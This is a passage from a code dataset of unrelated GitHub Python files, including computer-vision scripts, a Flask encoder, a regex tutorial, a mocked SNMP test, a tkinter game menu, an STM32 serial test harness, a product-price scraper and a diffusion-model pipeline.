edges)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"indra094/PythonStuffPlusOpenCV","sub_path":"Countours.py","file_name":"Countours.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"33711392231","text":"from flask.json import JSONEncoder\nfrom meddit.post import Post\n\nclass PostsJSONEncoder(JSONEncoder):\n def default(self, obj):\n if isinstance(obj, Post):\n return {\n 'id': obj.id,\n 'author': obj.author,\n 'gif_id': obj.gif_id,\n 'created': obj.created,\n 'votes': obj.votes,\n }\n return super().default(obj)\n","repo_name":"mking/meddit","sub_path":"meddit/posts_json_encoder.py","file_name":"posts_json_encoder.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"1217534545","text":"import re\n\n# 同时提取 月 日\nregex = r\"^([a-zA-Z]+) (\\d+)$\" # 必须使用 raw string\nif re.search(regex, \"June 24\"):\n match = re.search(regex, \"June 24\")\n\n print(\"Match at index %s, %s\" % (match.start(), match.end()))\n\n # match.group(0),match.group() 全部提取信息\n # match.group(1), match.group(2), ... 从左到右返回提取信息\n print(\"Full match: %s\" % (match.group(0)))\n print(\"Month: %s\" % (match.group(1)))\n print(\"Day: %s\" % (match.group(2)))\nelse:\n print(\"The regex pattern does not match. :(\")\n\nregex = r\"^[a-zA-Z]+ \\d+$\"\n# 找出所有匹配信息\nmatches = re.findall(regex, \"June 24, August 9, Dec 12\")\nfor match in matches:\n print(\"Full match: %s\" % (match))\n\n# 提取月\nregex = r\"([a-zA-Z]+) \\d+\"\nmatches = re.findall(regex, \"June 24, August 9, Dec 12\")\nfor match in matches:\n print(\"Match month: %s\" % (match))\n\nregex = r\"([a-zA-Z]+) \\d+\"\n# 返回匹配的开始 结束位置\nmatches = re.finditer(regex, \"June 24, August 9, Dec 12\")\nfor match in matches:\n print(\"Match at index: %s, %s\" % (match.start(), match.end()))\n\nregex = r\"([a-zA-Z]+) (\\d+)\"\nregex1 = r\"\\2 of \\1\"\n\n# 替换提取到的信息为新的模式\nprint(re.sub(regex, regex1, \"June 24, August 9, Dec 12\"))\n\nregex = re.compile(r\"(\\w+) World\")\nresult = regex.search(\"Hello World is the easiest\")\nif result:\n print(result.start(), result.end())\n\nfor result in regex.findall(\"Hello World, Bonjour World\"):\n print(result)\n\nprint(regex.sub(r\"\\1 Earth\", \"Hello World\"))\n","repo_name":"AutuanLiu/Fastai-Notes-V3","sub_path":"src/Regular_expressions.py","file_name":"Regular_expressions.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"}
+{"seq_id":"42345076261","text":"import os\nimport unittest\nfrom pyats.topology import loader\nfrom genie.libs.sdk.apis.linux.snmp.get import get_snmp_snmpwalk_v3\n\n\nclass TestGetSnmpSnmpwalkV3(unittest.TestCase):\n\n @classmethod\n def setUpClass(self):\n testbed = f\"\"\"\n devices:\n morph-full2:\n connections:\n defaults:\n class: unicon.Unicon\n a:\n command: mock_device_cli --os linux --mock_data_dir {os.path.dirname(__file__)}/mock_data --state connect\n protocol: unknown\n os: linux\n platform: linux\n type: linux\n \"\"\"\n self.testbed = loader.load(testbed)\n self.device = self.testbed.devices['morph-full2']\n self.device.connect(\n learn_hostname=True,\n init_config_commands=[],\n init_exec_commands=[]\n )\n\n def test_get_snmp_snmpwalk_v3(self):\n result = get_snmp_snmpwalk_v3(self.device, '172.20.249.11', '1.3.6.1.4.1.9.9.25.1.1.1.2', 'TestUsr2', 'password1', 'authPriv', 'md5', 'des', 'password', '3', None)\n expected_output = 'snmpget: Unknown user name'\n self.assertEqual(result, expected_output)\n","repo_name":"CiscoTestAutomation/genielibs","sub_path":"pkgs/sdk-pkg/src/genie/libs/sdk/apis/tests/linux/snmp/get/get_snmp_snmpwalk_v3/test_api_get_snmp_snmpwalk_v3.py","file_name":"test_api_get_snmp_snmpwalk_v3.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"16"}
+{"seq_id":"5111478825","text":"import tkinter as tk\nfrom random import randrange\n\n# Create tk instance\nhome_page = tk.Tk()\n\n# Window title\nhome_page.title(\"Minigames by Victor Nestor\")\n\n# Disable resizing\nhome_page.resizable(False, False)\n\n# Window sizing and position\nwindow_height = 500\nwindow_width = 500\nscreen_height = home_page.winfo_screenheight()\nscreen_width = home_page.winfo_screenwidth()\ny_coordinate = int((screen_height/2) - (window_height/2))\nx_coordinate = int((screen_width/2) - (window_width/2))\n\n# Set the dimensions and position of window.\nhome_page.geometry(\"{}x{}+{}+{}\".format(window_width,\n window_height, x_coordinate, y_coordinate))\n\n# Grid geometry\n# home_page.grid_rowconfigure(0, weight=1)\n# home_page.grid_rowconfigure(1, weight=1)\n# home_page.grid_rowconfigure(2, weight=1)\n# home_page.grid_rowconfigure(3, weight=1)\n# home_page.grid_rowconfigure(4, weight=1)\n# home_page.grid_rowconfigure(5, weight=1)\n# home_page.grid_rowconfigure(6, weight=1)\n# home_page.grid_rowconfigure(7, weight=1)\n# home_page.grid_rowconfigure(8, weight=1)\n# home_page.grid_rowconfigure(9, weight=1)\n# home_page.grid_rowconfigure(10, weight=1)\nfor num in range(0, 8):\n # Create 8 rows\n home_page.grid_rowconfigure(num, weight=1)\n\n# home_page.grid_columnconfigure(0, weight=1)\n# home_page.grid_columnconfigure(1, weight=1)\n# home_page.grid_columnconfigure(2, weight=1)\n# home_page.grid_columnconfigure(3, weight=1)\n# home_page.grid_columnconfigure(4, weight=1)\n\nfor num in range(0, 5):\n # Create 5 columns\n home_page.grid_columnconfigure(num, weight=1)\n\n# Create labels\nhome_label = tk.Label(home_page, text=\"Python Minigames!\", font=(30))\nfirst_line_break = tk.Label(\n home_page, text=\"*\" * 75)\ngame_label = tk.Label(home_page, text=\"Pick A Game\", font=(20))\nchosen_label = tk.Label(home_page, text=\"Game chosen: \\n\\nNone\", font=(20))\nsecond_line_break = tk.Label(\n home_page, text=\"*\" * 75)\nthird_line_break = tk.Label(\n home_page, text=\"*\" * 75)\n\n# Create buttons\n\n# List of games\ngame_buttons = []\ntic_tac_toe_button = tk.Button(\n home_page, text=\"Tic-Tac-Toe\", command=lambda: set_game(1))\ngame_buttons.append(tic_tac_toe_button)\nrock_paper_scissors_button = tk.Button(\n home_page, text=\"Rock, Paper, Scissors\", command=lambda: set_game(2))\ngame_buttons.append(rock_paper_scissors_button)\nguess_the_number_button = tk.Button(\n home_page, text=\"Guess The Number\", command=lambda: set_game(3))\ngame_buttons.append(guess_the_number_button)\nsnake_game_button = tk.Button(\n home_page, text=\"Snake Game\", command=lambda: set_game(4))\ngame_buttons.append(snake_game_button)\n\n# Start game list\nstart_game_list = []\nstart_game_button = tk.Button(home_page, text=\"Start Game\")\nstart_game_list.append(start_game_button)\n\n\n# Append labels and buttons to home page\nhome_label.grid(row=0, column=0, columnspan=5)\nfirst_line_break.grid(row=1, column=0, columnspan=5)\ngame_label.grid(row=2, column=0, columnspan=5)\nsecond_line_break.grid(row=4, column=0, columnspan=5)\nchosen_label.grid(row=5, column=0, columnspan=5)\nthird_line_break.grid(row=6, column=0, columnspan=5)\n\n# Append game buttons\nfor row in range(0, 1):\n for col in range(0, 4):\n i = row * 4 + col\n game_buttons[i].grid(row=row+3, column=col+1)\n\nstart_game_list[0].grid(row=7, column=0, columnspan=5)\n\n\n# Setup for selected game\n\n# 0 for none selected\ngame_selected = 0\n\nprint(game_selected)\n\n# Reset all variables\n\n\ndef init():\n global game_buttons, 
mode_buttons, game_selected, chosen_label\n game_selected = 0\n chosen_label[\"text\"] = \"Game chosen: \\n\\nNone\"\n\n\ndef set_game(i):\n global game_buttons, mode_buttons, game_selected\n print(i)\n game_selected = i\n # Check which game is selected\n if game_selected == 1:\n chosen_label[\"text\"] = \"Game chosen: \\n\\nTic-Tac-Toe\"\n elif game_selected == 2:\n chosen_label[\"text\"] = \"Game chosen: \\n\\nRock, Paper, Scissors\"\n elif game_selected == 3:\n chosen_label[\"text\"] = \"Game chosen: \\n\\nGuess The Number\"\n elif game_selected == 4:\n chosen_label[\"text\"] = \"Game chosen: \\n\\nSnake Game\"\n\n\ndef start_game(i):\n global game_selected\n\n\n# Mainloop keeps the program running until closed by the user.\nhome_page.mainloop()\n","repo_name":"VNestor/python-minigames","sub_path":"home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":4235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70171914250","text":"def createDataBase(db):\n cursor = db.cursor()\n cursor.execute('CREATE TABLE IF NOT EXISTS scores(bestScores)')\n\ndef insertNewHighScore(db, points):\n cursor = db.cursor()\n bestScore = returnBestScore(db)\n\n if points > bestScore:\n cursor.execute(f'INSERT INTO scores VALUES({points})')\n db.commit()\n\ndef returnBestScore(db):\n cursor = db.cursor()\n result = cursor.execute('SELECT bestScores FROM scores')\n\n bestScore = 0\n for row in result.fetchall():\n if row[0] > bestScore:\n bestScore = row[0]\n\n return bestScore\n","repo_name":"flipe27/flappy-bird","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"74870835207","text":"import os\nimport sys\nimport serial\nimport threading\nimport struct\nimport time\nimport traceback\n\nfrom AutoGrader.devices import HardwareBase\n\n\nclass STM32(HardwareBase):\n CMD_RESET_DUT = 'U'\n CMD_RESET_TESTER = 'R'\n CMD_ENABLE_ANALOG = 'O'\n CMD_TERMINATE = 'E'\n \n START_DELIM = b'S'\n STOP_DELIM = b'E'\n TOTAL_PKT_LEN = 9\n\n # parameters\n baud_rate = 460800\n usb_path = None\n input_waveform_path = None\n output_waveform_path = None\n\n # device info\n name = None\n config = None\n\n # parent\n hardware_engine = None\n\n # serial\n dev = None\n\n # files\n fin = None\n output_metadata = None\n\n # thread status\n uart_reading_thread = None\n alive = True\n\n # execution\n execution_start_time = None\n\n def __init__(self, name, config, hardware_engine, file_folder):\n \n if 'baud' in config:\n self.baud_rate = config['baud']\n\n if \"usb_path\" not in config:\n raise Exception('\"usb_path\" field is required')\n self.usb_path = config['usb_path']\n\n if 'input_waveform_file' not in config:\n raise Exception('\"input_waveform_file\" field is required')\n self.input_waveform_path = os.path.join(file_folder, config['input_waveform_file'])\n\n if 'output_waveform_file' in config and config['output_waveform_file']:\n self.output_waveform_path = os.path.join(file_folder, config['output_waveform_file'])\n else:\n self.output_waveform_path = '/dev/null'\n\n if 'output_metadata' not in config:\n raise Exception('\"output_metadata\" field is required')\n self.output_metadata = config['output_metadata']\n\n self.name = name\n self.config = config\n self.hardware_engine = hardware_engine\n\n def on_before_execution(self):\n\n # open serial port\n tmp_dev = serial.Serial()\n tmp_dev.port = self.usb_path\n tmp_dev.baudrate = self.baud_rate\n tmp_dev.parity = serial.PARITY_NONE\n tmp_dev.bytesize = serial.EIGHTBITS\n tmp_dev.stopbits = serial.STOPBITS_ONE\n tmp_dev.timeout = 0.01\n tmp_dev.writeTimeout = None\n\n # open input waveform file but get rid of the metadata part\n self.fin = open(self.input_waveform_path, 'r')\n while True:\n line = self.fin.readline()\n if not line or line.strip() == '==':\n break\n\n # open output waveform file and write the meatadata part\n self.output_lines = []\n self.output_lines.append('') # period\n self.output_lines.append('Tick frequency: %f' % self.output_metadata['tick_frequency'])\n self.output_lines.append('Display start')\n for pin_config in self.output_metadata['pins']:\n self.output_lines.append('%s,%s' % (\n pin_config['label'],\n ','.join(list(map(str, pin_config['indexes']))),\n ))\n self.output_lines.append('Display end')\n self.output_lines.append('==')\n\n self.alive = True\n \n try:\n tmp_dev.open() \n self.dev = tmp_dev\n print('(STM32) UART is open')\n self.send_command(self.CMD_RESET_TESTER)\n print('(STM32) reset')\n time.sleep(1)\n self.uart_reading_thread = threading.Thread(\n target=self._reading_thread, name=('STM32-%s-reading' % self.name)).start()\n except:\n exc_info = sys.exc_info()\n print('(STM32) UART device unable to open, full stack trace below')\n traceback.print_exception(*exc_info)\n self.alive = False\n\n def on_execute(self):\n self.execution_start_time = time.time()\n\n # feed input waveform file into STM32\n for line in self.fin:\n if not self.alive:\n break\n terms = line.split(',')\n pkt_type, pkt_time, pkt_val = chr(int(terms[0])), int(terms[1]), int(terms[2])\n binary = struct.pack('=ccIHc', self.START_DELIM, pkt_type.encode('ascii'), pkt_time,\n pkt_val, self.STOP_DELIM)\n if 
not self.dev:\n print('(STM32) UART device does not exist, not able to send the command')\n return\n self.dev.write(binary)\n print('(STM32) packet sent', pkt_type, pkt_time, pkt_val)\n\n self.fin.close()\n\n def on_terminate(self):\n self.alive = False\n \n execution_stop_time = time.time()\n execution_elasped_time = execution_stop_time - self.execution_start_time\n self.output_lines[0] = \"Period: %f\" % execution_elasped_time\n\n with open(self.output_waveform_path, 'w') as fo:\n fo.write('\\n'.join(self.output_lines))\n \n def on_reset_after_execution(self):\n \n try:\n self.dev.flush()\n self.dev.close()\n print('(STM32) UART is closed')\n except:\n print('(STM32) UART device unable to close')\n self.dev = None\n\n def __del__(self):\n if self.dev and self.dev.is_open:\n self.dev.close()\n\n def _reading_thread(self):\n rx_buffer = b''\n\n while self.alive:\n # continue immediately if serial isn't ready\n if not self.dev:\n continue\n\n # Because we set a read timeout, chances are we only get a \n # partial of a packet\n rx_buffer += self.dev.read(self.TOTAL_PKT_LEN)\n \n # Thus, if it's not a complete packet yet, read more\n if len(rx_buffer) < self.TOTAL_PKT_LEN:\n continue\n\n # check the packet is valid via start and stop byte\n # (The reason that we have to use bytes[0:1] is that var[0] returns an int)\n if rx_buffer[0:1] == self.START_DELIM and rx_buffer[8:9] == self.STOP_DELIM:\n self._handle_packet_payload(rx_buffer[1:8])\n else:\n print('(STM32) bad packet!', rx_buffer[0:9])\n\n rx_buffer = rx_buffer[9:]\n \n def _handle_packet_payload(self, binary):\n # 1B type, 4B time, 2B val\n [pkt_type, pkt_time, pkt_val] = struct.unpack('= FLAGS.max):\n break\n gray, _, _ = _pic2pic.encode_bgr(images.copy(), FLAGS.downsize)\n #l, ab, w = _pic2pic.encode_lab(images.copy(), FLAGS.downsize)\n #\n color, = sess.run([COLOR], feed_dict={GRAY: gray})\n\n cv2.imwrite(gallery.next(), gray[0])\n\n full = np.zeros(images.shape, dtype=np.float32)\n color /= 255.0\n gray /= 255.0\n _, H, W, _ = images.shape\n for i in range(images.shape[0]):\n lab = cv2.cvtColor(cv2.cvtColor(gray[i], cv2.COLOR_GRAY2BGR), cv2.COLOR_BGR2LAB)\n print(lab.shape)\n full[i, :, :, :1] = lab[:, :, :1]\n one = cv2.resize(color[i], (W, H))\n\n lab = cv2.cvtColor(one, cv2.COLOR_BGR2LAB)\n full[i, :, :, 1:] = lab[:, :, 1:]\n cv2.cvtColor(full[i], cv2.COLOR_LAB2BGR, full[i])\n if FLAGS.s_add and FLAGS.s_mul:\n hsv = cv2.cvtColor(full[i], cv2.COLOR_BGR2HSV)\n h, s, v = cv2.split(hsv)\n s *= FLAGS.s_mul\n s += FLAGS.s_add\n hsv = cv2.merge([h, s, v])\n cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR, full[i])\n pass\n full *= 255\n cv2.imwrite(gallery.next(), full[0])\n #y_p = decode_lab(l, ab_p, T=FLAGS.T)\n c += 1\n print('%d/%d' % (c, FLAGS.max))\n pass\n gallery.flush()\n pass\n pass\n\nif __name__ == '__main__':\n tf.app.run()\n\n","repo_name":"aaalgo/pic2pic","sub_path":"gan-colorize-val.py","file_name":"gan-colorize-val.py","file_ext":"py","file_size_in_byte":3909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"41672794051","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[7]:\n\n\nimport requests\nfrom bs4 import BeautifulSoup\n\ndef scrape_amazon(keyword):\n url = f'https://www.amazon.in/s?k={keyword}'\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'}\n response = requests.get(url, headers=headers)\n soup = BeautifulSoup(response.content, 'html.parser')\n\n products = soup.find_all('div', {'data-component-type': 's-search-result'})\n\n results = []\n for product in products:\n name_elem = product.find('span', {'class': 'a-size-medium'})\n price_elem = product.find('span', {'class': 'a-offscreen'})\n\n if name_elem and price_elem:\n name = name_elem.text.strip()\n price = price_elem.text.strip()\n results.append({'name': name, 'price': price})\n\n return results\n\ndef scrape_walmart(keyword):\n url = f'https://www.walmart.com/search/?query={keyword}'\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'}\n response = requests.get(url, headers=headers)\n soup = BeautifulSoup(response.content, 'html.parser')\n\n products = soup.find_all('div', {'class': 'search-result-product-title'})\n\n results = []\n for product in products:\n name_elem = product.find('a')\n price_elem = product.find_next('span', {'class': 'price-group'})\n\n if name_elem and price_elem:\n name = name_elem.text.strip()\n price = price_elem.text.strip()\n results.append({'name': name, 'price': price})\n\n return results\n\n# Example usage\nkeyword = 'laptop'\namazon_results = scrape_amazon(keyword)\nwalmart_results = scrape_walmart(keyword)\n\nif not amazon_results:\n print('No results found on Amazon.')\nelse:\n print('Amazon Results:')\n for result in amazon_results:\n print(result['name'], result['price'])\n\nif not walmart_results:\n print('No results found on Walmart.')\nelse:\n print('\\nWalmart Results:')\n for result in walmart_results:\n print(result['name'], result['price'])\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"NikeshKr/AmazonWebScrapper","sub_path":"amazonscrapper.py.py","file_name":"amazonscrapper.py.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"3085715238","text":"# ******************************************************\n# Program: compare_fields.py\n# Author: Stefano Ubbiali\n# Email: subbiali@phys.ethz.ch\n# Date: 04.06.2020\n# Description: Comparing two NumPy arrays\n# ******************************************************\nimport click\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef read_field_from_file(filename, num_halo=None):\n (rank, nbits, num_halo, nx, ny, nz) = np.fromfile(filename, dtype=np.int32, count=6)\n offset=(3 + rank) * 32 // nbits\n data = np.fromfile(filename, dtype=np.float32 if nbits == 32 else np.float64, \\\n count=nz * ny * nx + offset)\n if rank == 3:\n return np.reshape(data[offset:], (nz, ny, nx))\n else:\n return np.reshape(data[offset:], (ny, nx))\n\nfig, axs = plt.subplots(1, 1) #, figsize=(12, 4))\n\nref_field = read_field_from_file('out_field_mpi.dat')\nhybrid_field = read_field_from_file('out_field_mpiomp.dat')\ncomp_field = hybrid_field - ref_field\n \nk_lev = in_field.shape[0] // 2\nim1 = axs[0].imshow(comp_field[k_lev, :, :], origin='lower', vmin=-0.1, vmax=1.1);\nfig.colorbar(im1, ax=axs[0]);\naxs[0].set_title('Comparison field (k = {})'.format(k_lev));\n\n \n #k_lev = out_field.shape[0] // 2\n #im2 = axs[1].imshow(out_field[k_lev, :, :], origin='lower', vmin=-0.1, vmax=1.1);\n #fig.colorbar(im2, ax=axs[1]);\n #axs[1].set_title('Final result (k = {})'.format(k_lev));\n \nplt.savefig('test.png')","repo_name":"colintully92/HPCproject","sub_path":"heatmap.py","file_name":"heatmap.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"22863625418","text":"import math\nfrom typing import Any, Dict\n\nimport cv2\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom diffusers import LMSDiscreteScheduler, StableDiffusionPipeline\nfrom diffusers.models.attention_processor import Attention\nfrom diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion import \\\n StableDiffusionPipelineOutput\nfrom PIL import Image\nfrom tqdm.auto import tqdm\n\nfrom modelscope.metainfo import Pipelines\nfrom modelscope.outputs import OutputKeys\nfrom modelscope.pipelines.builder import PIPELINES\nfrom modelscope.pipelines.multi_modal.diffusers_wrapped.diffusers_pipeline import \\\n DiffusersPipeline\nfrom modelscope.utils.constant import Tasks\n\n\n@PIPELINES.register_module(\n Tasks.text_to_image_synthesis, module_name=Pipelines.cones2_inference)\nclass Cones2InferencePipeline(DiffusersPipeline):\n r\"\"\" Cones2 Inference Pipeline.\n\n Examples:\n\n >>> from modelscope.pipelines import pipeline\n\n >>> pipeline =pipeline(task=Tasks.text_to_image_synthesis, model= 'damo/Cones2', model_revision='v1.0.1')\n >>> {\n >>> \"text\": 'a mug and a dog on the beach',\n >>> \"subject_list\": [[\"mug\", 2], [\"dog\", 5]],\n >>> \"color_context\": {\"255,192,0\": [\"mug\", 2.5], \"255,0,0\": [\"dog\", 2.5]},\n >>> \"layout\": 'data/test/images/mask_example.png'\n >>> }\n >>>\n \"\"\"\n\n def __init__(self, model: str, device: str = 'gpu', **kwargs):\n \"\"\"\n use `model` to create a stable diffusion pipeline\n Args:\n model: model id on modelscope hub.\n device: str = 'gpu'\n \"\"\"\n super().__init__(model, device, **kwargs)\n self.pipeline = StableDiffusionPipeline.from_pretrained(model)\n self.pipeline.text_encoder.pooler = None\n self.pipeline.to(self.device)\n\n def forward(self, inputs: Dict[str, Any],\n **forward_params) -> Dict[str, Any]:\n if not isinstance(inputs, dict):\n raise ValueError(\n f'Expected the input to be a dictionary, but got {type(input)}'\n )\n if 'text' not in inputs:\n raise ValueError('input should contain \"text\", but not found')\n\n return self.layout_guidance_sampling(\n prompt=inputs.get('text'),\n residual_dict=inputs.get('residual_dict', None),\n subject_list=inputs.get('subject_list'),\n color_context=inputs.get('color_context', None),\n layout=inputs.get('layout', None),\n )\n\n @torch.no_grad()\n def layout_guidance_sampling(\n self,\n prompt='',\n residual_dict=None,\n subject_list=None,\n color_context=None,\n layout=None,\n cfg_scale=7.5,\n inference_steps=50,\n guidance_steps=50,\n guidance_weight=0.05,\n weight_negative=-1e8,\n ):\n\n layout = Image.open(layout).resize((768, 768)).convert('RGB')\n subject_color_dict = {\n tuple(map(int, key.split(','))): value\n for key, value in color_context.items()\n }\n\n vae = self.pipeline.vae\n unet = self.pipeline.unet\n text_encoder = self.pipeline.text_encoder\n tokenizer = self.pipeline.tokenizer\n unconditional_input_prompt = ''\n scheduler = LMSDiscreteScheduler.from_config(\n self.pipeline.scheduler.config)\n scheduler.set_timesteps(inference_steps, device=self.device)\n if guidance_steps > 0:\n guidance_steps = min(guidance_steps, inference_steps)\n scheduler_guidance = LMSDiscreteScheduler(\n beta_start=0.00085,\n beta_end=0.012,\n beta_schedule='scaled_linear',\n num_train_timesteps=1000,\n )\n scheduler_guidance.set_timesteps(\n guidance_steps, device=self.device)\n\n # Process input prompt text\n text_input = tokenizer(\n [prompt],\n padding='max_length',\n max_length=tokenizer.model_max_length,\n truncation=True,\n 
return_tensors='pt',\n )\n\n # Edit text embedding conditions with residual token embeddings.\n cond_embeddings = text_encoder(text_input.input_ids.to(self.device))[0]\n if residual_dict is not None:\n for name, token in subject_list:\n residual_token_embedding = torch.load(residual_dict[name])\n cond_embeddings[0][token] += residual_token_embedding.reshape(\n 1024)\n\n # Process unconditional input \"\" for classifier-free guidance.\n max_length = text_input.input_ids.shape[-1]\n uncond_input = tokenizer([unconditional_input_prompt],\n padding='max_length',\n max_length=max_length,\n return_tensors='pt')\n uncond_embeddings = text_encoder(\n uncond_input.input_ids.to(self.device))[0]\n\n register_attention_control(unet)\n\n # Calculate the hidden features for each cross attention layer.\n hidden_states, uncond_hidden_states = _extract_cross_attention(\n tokenizer, self.device, layout, subject_color_dict, text_input,\n weight_negative)\n hidden_states['CONDITION_TENSOR'] = cond_embeddings\n uncond_hidden_states['CONDITION_TENSOR'] = uncond_embeddings\n hidden_states['function'] = lambda w, sigma, qk: (\n guidance_weight * w * math.log(1 + sigma**2)) * qk.std()\n uncond_hidden_states['function'] = lambda w, sigma, qk: 0.0\n\n # Sampling the initial latents.\n latent_size = (1, unet.in_channels, 96, 96)\n latents = torch.randn(latent_size).to(self.device)\n latents = latents * scheduler.init_noise_sigma\n\n for i, t in tqdm(\n enumerate(scheduler.timesteps),\n total=len(scheduler.timesteps)):\n # Improve the harmony of generated images by self-recurrence.\n if i < guidance_steps:\n loop = 2\n else:\n loop = 1\n for k in range(loop):\n if i < guidance_steps:\n sigma = scheduler_guidance.sigmas[i]\n latent_model_input = scheduler.scale_model_input(\n latents, t)\n _t = t\n\n hidden_states.update({'SIGMA': sigma})\n\n noise_pred_text = unet(\n latent_model_input,\n _t,\n encoder_hidden_states=hidden_states,\n ).sample\n\n uncond_hidden_states.update({'SIGMA': sigma})\n\n noise_pred_uncond = unet(\n latent_model_input,\n _t,\n encoder_hidden_states=uncond_hidden_states,\n ).sample\n\n noise_pred = noise_pred_uncond + cfg_scale * (\n noise_pred_text - noise_pred_uncond)\n latents = scheduler.step(noise_pred, t, latents,\n 1).prev_sample\n\n # Self-recurrence.\n if k < 1 and loop > 1:\n noise_recurent = torch.randn(latents.shape).to(\n self.device)\n sigma_difference = scheduler.sigmas[\n i]**2 - scheduler.sigmas[i + 1]**2\n latents = latents + noise_recurent * (\n sigma_difference**0.5)\n else:\n latent_model_input = scheduler.scale_model_input(\n latents, t)\n _t = t\n noise_pred_text = unet(\n latent_model_input,\n _t,\n encoder_hidden_states=cond_embeddings,\n ).sample\n\n latent_model_input = scheduler.scale_model_input(\n latents, t)\n\n noise_pred_uncond = unet(\n latent_model_input,\n _t,\n encoder_hidden_states=uncond_embeddings,\n ).sample\n\n noise_pred = noise_pred_uncond + cfg_scale * (\n noise_pred_text - noise_pred_uncond)\n latents = scheduler.step(noise_pred, t, latents,\n 1).prev_sample\n\n edited_images = _latents_to_images(vae, latents)\n\n return StableDiffusionPipelineOutput(\n images=edited_images, nsfw_content_detected=None)\n\n def postprocess(self, inputs: Dict[str, Any], **kwargs) -> Dict[str, Any]:\n images = []\n for img in inputs.images:\n if isinstance(img, Image.Image):\n img = cv2.cvtColor(np.array(img), cv2.COLOR_RGB2BGR)\n images.append(img)\n return {OutputKeys.OUTPUT_IMGS: images}\n\n\nclass Cones2AttnProcessor:\n\n def __init__(self):\n super().__init__()\n\n 
def __call__(self,\n attn: Attention,\n hidden_states,\n encoder_hidden_states=None,\n attention_mask=None):\n batch_size, sequence_length, _ = hidden_states.shape\n query = attn.to_q(hidden_states)\n is_dict_format = True\n if encoder_hidden_states is not None:\n if 'CONDITION_TENSOR' in encoder_hidden_states:\n encoder_hidden = encoder_hidden_states['CONDITION_TENSOR']\n else:\n encoder_hidden = encoder_hidden_states\n is_dict_format = False\n else:\n encoder_hidden = hidden_states\n\n key = attn.to_k(encoder_hidden)\n value = attn.to_v(encoder_hidden)\n\n query = attn.head_to_batch_dim(query)\n key = attn.head_to_batch_dim(key)\n value = attn.head_to_batch_dim(value)\n\n attention_scores = torch.matmul(query, key.transpose(-1, -2))\n attention_size_of_img = attention_scores.size()[-2]\n\n if attention_scores.size()[2] == 77:\n if is_dict_format:\n f = encoder_hidden_states['function']\n try:\n w = encoder_hidden_states[\n f'CA_WEIGHT_{attention_size_of_img}']\n except KeyError:\n w = encoder_hidden_states['CA_WEIGHT_ORIG']\n if not isinstance(w, int):\n img_h, img_w, nc = w.shape\n ratio = math.sqrt(img_h * img_w\n / attention_size_of_img)\n w = F.interpolate(\n w.permute(2, 0, 1).unsqueeze(0),\n scale_factor=1 / ratio,\n mode='bilinear',\n align_corners=True)\n w = F.interpolate(\n w.reshape(1, nc, -1),\n size=(attention_size_of_img, ),\n mode='nearest').permute(2, 1, 0).squeeze()\n else:\n w = 0\n if type(w) is int and w == 0:\n sigma = encoder_hidden_states['SIGMA']\n cross_attention_weight = f(w, sigma, attention_scores)\n else:\n bias = torch.zeros_like(w)\n bias[torch.where(w > 0)] = attention_scores.std() * 0\n sigma = encoder_hidden_states['SIGMA']\n cross_attention_weight = f(w, sigma, attention_scores)\n cross_attention_weight = cross_attention_weight + bias\n else:\n cross_attention_weight = 0.0\n else:\n cross_attention_weight = 0.0\n\n attention_scores = (attention_scores\n + cross_attention_weight) * attn.scale\n attention_probs = attention_scores.softmax(dim=-1)\n\n hidden_states = torch.matmul(attention_probs, value)\n hidden_states = attn.batch_to_head_dim(hidden_states)\n\n # linear proj\n hidden_states = attn.to_out[0](hidden_states)\n # dropout\n hidden_states = attn.to_out[1](hidden_states)\n\n return hidden_states\n\n\ndef register_attention_control(unet):\n attn_procs = {}\n for name in unet.attn_processors.keys():\n attn_procs[name] = Cones2AttnProcessor()\n\n unet.set_attn_processor(attn_procs)\n\n\ndef _tokens_img_attention_weight(img_context_seperated,\n tokenized_texts,\n ratio: int = 8,\n original_shape=False):\n token_lis = tokenized_texts['input_ids'][0].tolist()\n w, h = img_context_seperated[0][1].shape\n\n w_r, h_r = round(w / ratio), round(h / ratio)\n ret_tensor = torch.zeros((w_r * h_r, len(token_lis)), dtype=torch.float32)\n for v_as_tokens, img_where_color in img_context_seperated:\n\n is_in = 0\n\n for idx, tok in enumerate(token_lis):\n if token_lis[idx:idx + len(v_as_tokens)] == v_as_tokens:\n is_in = 1\n\n ret_tensor[:, idx:idx + len(v_as_tokens)] += (\n _downsampling(img_where_color, w_r,\n h_r).reshape(-1,\n 1).repeat(1, len(v_as_tokens)))\n\n if not is_in == 1:\n print(\n f'Warning ratio {ratio} : tokens {v_as_tokens} not found in text'\n )\n\n if original_shape:\n ret_tensor = ret_tensor.reshape((w_r, h_r, len(token_lis)))\n\n return 